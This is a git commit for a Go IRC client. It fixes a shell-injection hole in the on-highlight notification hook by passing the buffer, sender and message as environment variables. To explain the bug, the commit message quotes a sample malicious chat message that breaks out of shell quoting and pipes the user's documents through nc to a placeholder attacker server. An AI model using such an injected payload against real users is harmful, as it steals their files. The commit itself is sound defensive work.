Use environment variables for on-highlight

Breaking change!

The old approach of format modifiers is not ideal and usually has
problems with shell quoting, that way anyone is able to get a remote
shell just by sending a malicious message like:

    <evilhacker> "; tar -c $(find documents) | nc hackersserver 1337; "

Given that my on-highlight is:
    notify-send "%b" "<%n> %m"

This would be transformed into:

    notify-send "#cmpwn" "<evilhacker> "; tar -c $(find documents) | nc hackersserver 1337; ""

And this way it becomes a huge security vulnerability.

When using environment variables combined with double quotes, shell
escapes everything that appears there and gives the raw result to
command executed.

Though, this requires a little update to users' on-highlight setting:

  %b -> $BUFFER
  %n -> $SENDER
  %m -> $MESSAGE
  %h -> $HERE

1 files changed, 9 insertions, 8 deletions

diff --git a/app.go b/app.go
index a336588..61171a0 100644
--- a/app.go
+++ b/app.go
@@ -4,6 +4,7 @@ import (
 	"crypto/tls"
 	"fmt"
 	"net"
+	"os"
 	"os/exec"
 	"strings"
 	"time"
@@ -555,14 +556,14 @@ func (app *App) notifyHighlight(buffer, nick, content string) {
 	if buffer == app.win.CurrentBuffer() {
 		here = "1"
 	}
-	r := strings.NewReplacer(
-		"%%", "%",
-		"%b", buffer,
-		"%h", here,
-		"%n", nick,
-		"%m", cleanMessage(content))
-	command := r.Replace(app.cfg.OnHighlight)
-	output, err := exec.Command(sh, "-c", command).CombinedOutput()
+	cmd := exec.Command(sh, "-c", app.cfg.OnHighlight)
+	cmd.Env = append(os.Environ(),
+		fmt.Sprintf("BUFFER=%s", buffer),
+		fmt.Sprintf("HERE=%s", here),
+		fmt.Sprintf("SENDER=%s", nick),
+		fmt.Sprintf("MESSAGE=%s", cleanMessage(content)),
+	)
+	output, err := cmd.CombinedOutput()
 	if err != nil {
 		body := fmt.Sprintf("Failed to invoke on-highlight command: %v. Output: %q", err, string(output))
 		app.win.AddLine(Home, false, ui.Line{